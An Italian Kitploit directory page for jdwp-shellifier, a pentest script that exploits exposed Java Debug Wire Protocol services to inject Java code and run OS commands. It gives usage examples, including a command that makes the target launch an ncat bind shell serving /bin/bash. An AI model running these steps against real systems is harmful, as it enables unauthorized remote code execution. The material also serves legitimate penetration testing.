Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
jdwp-shellifier — Script di sfruttamento per servizi esposti del Java Debug Wire Protocol (JDWP), che consente ai pentester di iniettare codice Java ed eseguire comandi arbitrari del sistema operativo sulle JVM target. | Kitploit
Strumenti/GitHubGitHub/ioactive/jdwp-shellifier
ExploitDebuggerPenetration TestingConfigurazione Errata
GitHubioactive/jdwp-shellifier

jdwp-shellifier

Script di sfruttamento per servizi esposti del Java Debug Wire Protocol (JDWP), che consente ai pentester di iniettare codice Java ed eseguire comandi arbitrari del sistema operativo sulle JVM target.

Vedi Repository
91728939 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Script di sfruttamento per JDWP

Cos'è?

Questo script di sfruttamento è pensato per essere usato dai pentester contro un servizio JDWP attivo, al fine di ottenere l'esecuzione remota di codice (Remote Code Execution).

Come funziona?

In modo abbastanza standard, lo script richiede solo un interprete Python 2:

root@kitploit:~
% python ./jdwp-shellifier.py -h
usage: jdwp-shellifier.py [-h] -t IP [-p PORT] [--break-on JAVA_METHOD]
                      [--cmd COMMAND]

Universal exploitation script for JDWP by @_hugsy_

optional arguments:
-h, --help            show this help message and exit
-t IP, --target IP    Remote target IP (default: None)
-p PORT, --port PORT  Remote target port (default: 8000)
--break-on JAVA_METHOD
Specify full path to method to break on (default:
	java.net.ServerSocket.accept)
	--cmd COMMAND         Specify full path to method to break on (default:
		None)

Per puntare a un host/porta specifico:

root@kitploit:~
$ python ./jdwp-shellifier.py -t my.target.ip -p 1234

Questo comando inietterà solo codice Java nella JVM e mostrerà alcune informazioni come il sistema operativo e la versione di Java. Poiché non esegue codice/binari esterni, è del tutto sicuro e può essere usato come Proof-Of-Concept.

root@kitploit:~
$ python ./jdwp-shellifier.py -t my.target.ip -p 1234 --cmd "ncat -v -l -p 1234 -e /bin/bash"

Questo comando eseguirà effettivamente il processo ncat con l'argomento specificato, con i diritti concessi alla JVM in esecuzione.

Prima di inviare domande, assicurati di leggere http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html per una piena comprensione del protocollo JDWP.

Ringraziamenti

  • Ilja Van Sprundel
  • Sebastien Macke
Scarica lo strumento